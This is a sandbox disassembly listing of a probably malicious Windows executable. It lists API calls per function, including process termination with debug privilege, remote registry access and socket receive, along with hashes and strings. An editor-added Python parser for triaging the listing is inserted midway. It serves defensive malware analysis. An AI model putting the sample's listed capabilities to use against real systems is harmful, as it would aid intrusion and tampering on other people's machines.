                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F1C07D
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2014098862-0
                                                                                        • Opcode ID: 9ae2a8ea46bfdf41bcfe09f7c052826f5de77dc8e65bee97de25a3132e74ec17
                                                                                        • Instruction ID: dbe6651bd95db72e8b66ac7ade76bbc9ea07e85bb0b6fad6b9899b68f6532f68
                                                                                        • Instruction Fuzzy Hash: FD11C4B1A4061CBEF7106B75CC89FAA3B2DEB5C755F100415F350AB0E1CAF75C81AAA4
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F1AEF1,00000B00,?,?), ref: 00F1B26C
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00F1AEF1,00000B00,?,?), ref: 00F1B273
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F1AEF1,00000B00,?,?), ref: 00F1B288
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00F1AEF1,00000B00,?,?), ref: 00F1B290
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00F1AEF1,00000B00,?,?), ref: 00F1B293
                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F1AEF1,00000B00,?,?), ref: 00F1B2A3
                                                                                        • GetCurrentProcess.KERNEL32(00F1AEF1,00000000,?,00F1AEF1,00000B00,?,?), ref: 00F1B2AB
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00F1AEF1,00000B00,?,?), ref: 00F1B2AE
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00F1B2D4,00000000,00000000,00000000), ref: 00F1B2C8
                                                                                        Similarity
                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 1957940570-0
                                                                                        • Opcode ID: f2882d790333d813dc3a2536912f28eda5b7ac3201862903b3e710f6cd405852
                                                                                        • Instruction ID: 12d4e91271f50214b59ac89664f2c606c756aa605fcf4d43811cd141346f3d9f
                                                                                        • Instruction Fuzzy Hash: 8A01BBB5740348BFE710AFA5DC4AF6B7BACEB89711F018411FA15DB2A1CAB49800DB61
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                        • API String ID: 0-572801152
                                                                                        • Opcode ID: c4bfa12e06be0bd31706c0a99e75169b8bb64929a759975cd284b94e92e94b28
                                                                                        • Instruction ID: 92bdbbf0e7eb8bb37187086a2a20873bf4471da9506088a0df1a7d6dbe42a0ab
                                                                                        • Instruction Fuzzy Hash: 34E19072E00219ABDF14DFA8DC91BAE77B5EF48364F148029E905BB281D770AD41EBD0
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                        • API String ID: 2862541840-625585964
                                                                                        • Opcode ID: dee684326c29fb9185d5dc12828ec5a91328cad77be73df9a589493065000113
                                                                                        • Instruction ID: 29658e6c178457c4761c7cd367c22bdccbb8a0ae4384a7f08389dbc7c51d0cff
                                                                                        • Instruction Fuzzy Hash: 3791A171E00219ABDF24CFA5CC54FAEB7B8EF85720F108159FA15AB281DB709944DFA0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F49B19
                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F49B2D
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F49B47
                                                                                        • _wcscat.LIBCMT ref: 00F49BA2
                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F49BB9
                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F49BE7
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                        • String ID: SysListView32
                                                                                        • API String ID: 307300125-78025650
                                                                                        • Opcode ID: cdf52b07bf8fd676727940f419a3e3fb256835b1076cad2152a706705974cf9d
                                                                                        • Instruction ID: 1447636a100ab475a68fbe0aea52b6a62699be14070c2198dc64c396774e5846
                                                                                        • Instruction Fuzzy Hash: FA418271A44308ABEB219F64CC85BEB7BA8EF48350F10442AF945E7291D7B59D84EB60
                                                                                        APIs
                                                                                          • Part of subcall function 00F26532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00F26554
                                                                                          • Part of subcall function 00F26532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F26564
                                                                                          • Part of subcall function 00F26532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00F265F9
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F4179A
                                                                                        • GetLastError.KERNEL32 ref: 00F417AD
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F417D9
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F41855
                                                                                        • GetLastError.KERNEL32(00000000), ref: 00F41860
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F41895
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                        • String ID: SeDebugPrivilege
                                                                                        • API String ID: 2533919879-2896544425
                                                                                        • Opcode ID: 6f8ff140a0299f3a3c40d92b0fd275eb5fdccc1b45a89ccfdf5fe213bf468a79
                                                                                        • Instruction ID: 6b7b3e94da8211179cc481a8fd9b2f25b5d30d081a029109eb00a1c4f371dc4c
                                                                                        • Instruction Fuzzy Hash: B6419D71B00204AFDB15EF54CD96F6DBBA5AF54310F058058FA06AB2D2DBB8A9409B91
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00F258B8
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2457776203-404129466
                                                                                        • Opcode ID: 73519379d19611773c467253f7a21bb8275963737b953111451593f52d8fcc86
                                                                                        • Instruction ID: 675cb3b1dc8e2ab9778f18a2e56274cda7f1dcb4b37dd3f607f6f901034285a9
                                                                                        • Instruction Fuzzy Hash: 9F110D7670D757BAEB055B54AC82EEA739CDF16B20F20003AF510E52C1EBF4EA007265
                                                                                        APIs
                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00F2A806
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafeVartype
                                                                                        • String ID:
                                                                                        • API String ID: 1725837607-0
                                                                                        • Opcode ID: e89f1b32892d3617f9959398e6832f37ff8dceac370f924475c9f079b32fd5ed
                                                                                        • Instruction ID: 0f789b196845befb7eefdeb4bceaf0a45e2d02af68e9d9a8fd810fb84d34b566
                                                                                        • Opcode Fuzzy Hash: e89f1b32892d3617f9959398e6832f37ff8dceac370f924475c9f079b32fd5ed
                                                                                        • Instruction Fuzzy Hash: DFC17D75A0422ADFDB04CF98E891BAEB7F4FF08311F204469E615E7241D778AA41DF91
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F26B63
                                                                                        • LoadStringW.USER32(00000000), ref: 00F26B6A
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F26B80
                                                                                        • LoadStringW.USER32(00000000), ref: 00F26B87
                                                                                        • _wprintf.LIBCMT ref: 00F26BAD
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F26BCB
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00F26BA8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 3648134473-3128320259
                                                                                        • Opcode ID: 1cba97c075b308d216b253f34183710e6e30b9e57c0a7d608ddf8976bd84ad79
                                                                                        • Instruction ID: 435d21ec07a9a3ea33654f26db1766948e18b993a395b1a95a6cf71807644415
                                                                                        • Opcode Fuzzy Hash: 1cba97c075b308d216b253f34183710e6e30b9e57c0a7d608ddf8976bd84ad79
                                                                                        • Instruction Fuzzy Hash: 020112F690025C7FEB11A7A49D89EE6766CE708304F444492F756E2041EAB49E84AB71
                                                                                        APIs
                                                                                          • Part of subcall function 00F43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F42BB5,?,?), ref: 00F43C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F42BF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharConnectRegistryUpper
                                                                                        • String ID:
                                                                                        • API String ID: 2595220575-0
                                                                                        • Opcode ID: 4256be6b2a537393dcc17fcd62da8d0dd5c32b03a2b25873a87ed10743fa5e59
                                                                                        • Instruction ID: d3f8d18747b558956fbecac035bf9ff4575f9c9fffaed9a1d3ee3b1c2e582e7a
                                                                                        • Opcode Fuzzy Hash: 4256be6b2a537393dcc17fcd62da8d0dd5c32b03a2b25873a87ed10743fa5e59
                                                                                        • Instruction Fuzzy Hash: 74918E71A04205AFC710EF15C891B6EBBF5FF88310F54881DFA96972A2DB74E905EB42
                                                                                        APIs
                                                                                        • select.WSOCK32 ref: 00F39691
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F3969E
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00F396C8
                                                                                         • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F396E9 (import by ordinal; ordinal 17 of wsock32.dll is recvfrom)
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F396F8
                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00F397AA
                                                                                        • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00F7DC00), ref: 00F39765
                                                                                          • Part of subcall function 00F1D2FF: _strlen.LIBCMT ref: 00F1D309
                                                                                        • _strlen.LIBCMT ref: 00F39800
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                        • String ID:
                                                                                        • API String ID: 3480843537-0
                                                                                        • Opcode ID: 4d0c272e3203625247ceed4fb4436567d31889f418bcf44398d7805a6796a27b
                                                                                        • Instruction ID: f9e295770e27bbcc53bd44f33dd0c8e1cc6189e70923946ee4513d291170ab6c
                                                                                        • Opcode Fuzzy Hash: 4d0c272e3203625247ceed4fb4436567d31889f418bcf44398d7805a6796a27b
                                                                                        • Instruction Fuzzy Hash: 8E81E031508244ABC710EF65DC86F6BB7E8EF88720F104A1DF555AB2A1EBB0DD05DB92
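Every per-function entry in this listing follows one layout: an `APIs` section of `Name.MODULE(args), ref: ADDR` lines (some imported by ordinal, such as `#17.WSOCK32`, which is `recvfrom`), indented `Part of subcall function` lines, an optional `Strings` section, then the dump-source and similarity fields ending with the instruction fuzzy hash. The following parser is an added example and is not part of the Joe Sandbox report or its tooling: it turns that layout into records, resolves the wsock32 ordinal import seen in the entry above, and tags each function with a coarse capability so the socket-receive, message-box and remote-registry routines can be pulled out of several thousand lines. The capability map and the wsock32 ordinal subset are the editor's assumptions, and the sample input is constructed from three complete entries of this report.

```python
"""Parse Joe Sandbox per-function 'APIs' entries and tag them by capability.
Added example, not Joe Sandbox tooling. The ordinal table and the capability
map below are the editor's assumptions, not values taken from the report."""
import re
from dataclasses import dataclass, field

# Partial wsock32.dll export-ordinal table (assumption: a hand-picked subset that
# covers the socket calls seen in this report; other DLLs use different ordinals).
WSOCK32_ORDINALS = {4: "connect", 16: "recv", 17: "recvfrom", 18: "select",
                    19: "send", 20: "sendto", 23: "socket"}

# Coarse triage tags keyed on resolved API names (assumption, tune per case).
CAPABILITIES = {
    "network_receive": {"recv", "recvfrom", "select", "__WSAFDIsSet"},
    "process_launch": {"ShellExecuteExW", "ShellExecuteW", "CreateProcessW"},
    "remote_registry": {"RegConnectRegistryW"},
    "user_dialog": {"MessageBoxW"},
}

API_RE = re.compile(r"^(?P<name>[#\w]+)\.(?P<module>[A-Za-z0-9_]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<func>[0-9A-Fa-f]+):\s*(?P<rest>.+)$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")


@dataclass
class ApiCall:
    name: str          # resolved name (ordinal imports mapped through the table)
    module: str
    args: list
    ref: str
    via: str = ""      # address of the subcall function, "" for direct calls


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # Source File, API ID, hashes, ...


def resolve_name(name, module):
    """Map a '#17.WSOCK32' style ordinal import to its export name."""
    if name.startswith("#") and module.upper() == "WSOCK32":
        return WSOCK32_ORDINALS.get(int(name[1:]), name)
    return name


def parse_api(text, via=""):
    m = API_RE.match(text)
    if not m:
        return None
    args = [a for a in (m.group("args") or "").split(",") if a]
    return ApiCall(resolve_name(m.group("name"), m.group("module")),
                   m.group("module"), args, m.group("ref").upper(), via)


def parse_report(text):
    """Split the listing into FunctionEntry records; a record ends at its
    'Instruction Fuzzy Hash' line, which is how the page itself is laid out."""
    entries, cur, section = [], FunctionEntry(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if line.startswith("•"):
            line = line[1:].strip()
        if section == "APIs":
            sub = SUBCALL_RE.match(line)
            call = parse_api(sub.group("rest"), sub.group("func")) if sub else parse_api(line)
            if call:
                cur.apis.append(call)
        elif section == "Strings":
            cur.strings.append(line.rsplit(", xrefs:", 1)[0])   # drop the xref address
        else:
            kv = KV_RE.match(line)
            if kv:
                cur.fields[kv.group("key")] = kv.group("val")
                if kv.group("key") == "Instruction Fuzzy Hash":
                    entries.append(cur)
                    cur, section = FunctionEntry(), None
    return entries


def capabilities(entry):
    """Tags whose API set intersects the entry's calls; subcall APIs count too,
    since the report lists them as reachable from the function."""
    names = {c.name for c in entry.apis}
    return {tag for tag, apis in CAPABILITIES.items() if names & apis}


def triage(text):
    """Return (API ID, sorted tags, resolved call names) for every tagged entry."""
    out = []
    for e in parse_report(text):
        tags = capabilities(e)
        if tags:
            out.append((e.fields.get("API ID", ""), sorted(tags), [c.name for c in e.apis]))
    return out


# Constructed sample in the page's listing format: three entries copied from
# this report (associated-dump lines omitted for brevity).
SAMPLE = """
APIs
• select.WSOCK32 ref: 00F39691
• WSAGetLastError.WSOCK32(00000000), ref: 00F3969E
• __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00F396C8
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F396E9
• inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00F7DC00), ref: 00F39765
  • Part of subcall function 00F1D2FF: _strlen.LIBCMT ref: 00F1D309
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
Similarity
• API ID: ErrorLast_strlen$htonsinet_ntoaselect
• String ID:
• Instruction Fuzzy Hash: 8E81E031508244ABC710EF65DC86F6BB7E8EF88720F104A1DF555AB2A1EBB0DD05DB92
APIs
• LoadStringW.USER32(00000000), ref: 00F26B6A
• _wprintf.LIBCMT ref: 00F26BAD
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F26BCB
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00F26BA8
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• Instruction Fuzzy Hash: 020112F690025C7FEB11A7A49D89EE6766CE708304F444492F756E2041EAB49E84AB71
APIs
  • Part of subcall function 00F43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F42BB5,?,?), ref: 00F43C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F42BF6
Similarity
• API ID: BuffCharConnectRegistryUpper
• Instruction Fuzzy Hash: 74918E71A04205AFC710EF15C891B6EBBF5FF88310F54881DFA96972A2DB74E905EB42
"""

if __name__ == "__main__":
    for api_id, tags, calls in triage(SAMPLE):
        print(f"{api_id:45} {','.join(tags):18} {' '.join(calls)}")
```

Run it against the full text of this page (copy the listing into a file and pass it to `parse_report`) to get one record per function; the `Instruction Fuzzy Hash` and `API ID` fields then key the records back to the entries here, and the `network_receive` tag lands on the entry above because `#17` resolves to `recvfrom`.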
                                                                                        APIs
                                                                                        • __mtinitlocknum.LIBCMT ref: 00F0A991
                                                                                          • Part of subcall function 00F07D7C: __FF_MSGBANNER.LIBCMT ref: 00F07D91
                                                                                          • Part of subcall function 00F07D7C: __NMSG_WRITE.LIBCMT ref: 00F07D98
                                                                                          • Part of subcall function 00F07D7C: __malloc_crt.LIBCMT ref: 00F07DB8
                                                                                        • __lock.LIBCMT ref: 00F0A9A4
                                                                                        • __lock.LIBCMT ref: 00F0A9F0
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00F96DE0,00000018,00F15E7B,?,00000000,00000109), ref: 00F0AA0C
                                                                                        • EnterCriticalSection.KERNEL32(8000000C,00F96DE0,00000018,00F15E7B,?,00000000,00000109), ref: 00F0AA29
                                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 00F0AA39
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1422805418-0
                                                                                        • Opcode ID: da5f5c69960ad7295071dd2b8d10fe9e8ddb7cdac6bc1ba56628ab917b7fec82
                                                                                        • Instruction ID: 3732805351b9076b6d7f518785403d80deb94ea1c220e336b5348b2360546261
                                                                                        • Opcode Fuzzy Hash: da5f5c69960ad7295071dd2b8d10fe9e8ddb7cdac6bc1ba56628ab917b7fec82
                                                                                        • Instruction Fuzzy Hash: DB4104B1F00709DBEB249F68DE4575DB7A0AF05335F108219E425AB2E1DBB89940FB92
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 00F48EE4
                                                                                        • GetDC.USER32(00000000), ref: 00F48EEC
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F48EF7
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00F48F03
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00F48F3F
                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F48F50
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F4BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00F48F8A
                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F48FAA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3864802216-0
                                                                                        • Opcode ID: c5bc953780ea506e4d92df6e54befec2ca55013fb0f0487882eac214024e3323
                                                                                        • Instruction ID: 32fd0cbeddd96bd64394159eec13a007adb55ac5fe696e812666b0e1f28ffe77
                                                                                        • Opcode Fuzzy Hash: c5bc953780ea506e4d92df6e54befec2ca55013fb0f0487882eac214024e3323
                                                                                        • Instruction Fuzzy Hash: 00317F72600214BFEB108F54CC49FEA3FADEF49765F044065FE199A191C6B69842DB70
                                                                                        APIs
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                          • Part of subcall function 00EFC6F4: _wcscpy.LIBCMT ref: 00EFC717
                                                                                        • _wcstok.LIBCMT ref: 00F3184E
                                                                                        • _wcscpy.LIBCMT ref: 00F318DD
                                                                                        • _memset.LIBCMT ref: 00F31910
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                        • String ID: X
                                                                                        • API String ID: 774024439-3081909835
                                                                                        • Opcode ID: 5a327c34dcccec1f602b07fa96896821a948028e097bf04f9c93bfed850a87d4
                                                                                        • Instruction ID: 2d33f3f8743723d13e91f7c2f19818a6420ade48886937ac0b669b2a21cd6674
                                                                                        • Opcode Fuzzy Hash: 5a327c34dcccec1f602b07fa96896821a948028e097bf04f9c93bfed850a87d4
                                                                                        • Instruction Fuzzy Hash: BEC191356083849FC724EF64C981A5EB7E4FF85360F00496DF999A72A2DB30ED05DB92
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00F5016D
                                                                                        • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00F5038D
                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F503AB
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00F503D6
                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F503FF
                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 00F50421
                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00F50440
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                        • String ID:
                                                                                        • API String ID: 3356174886-0
                                                                                        • Opcode ID: b4e77c923b705cd2ef8a5c4c6eda02bd0e6207dc0572fd3c4b8c580f905d1426
                                                                                        • Instruction ID: 937a2668ef5ba3fde83965552e90b8a1c8d5d872c30dcfb701541d92c3f7e467
                                                                                        • Opcode Fuzzy Hash: b4e77c923b705cd2ef8a5c4c6eda02bd0e6207dc0572fd3c4b8c580f905d1426
                                                                                        • Instruction Fuzzy Hash: C0A1E231A00616EFDB18CF68C9857BDBBB1BF04752F048115EE54E7290DB74AD54EB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
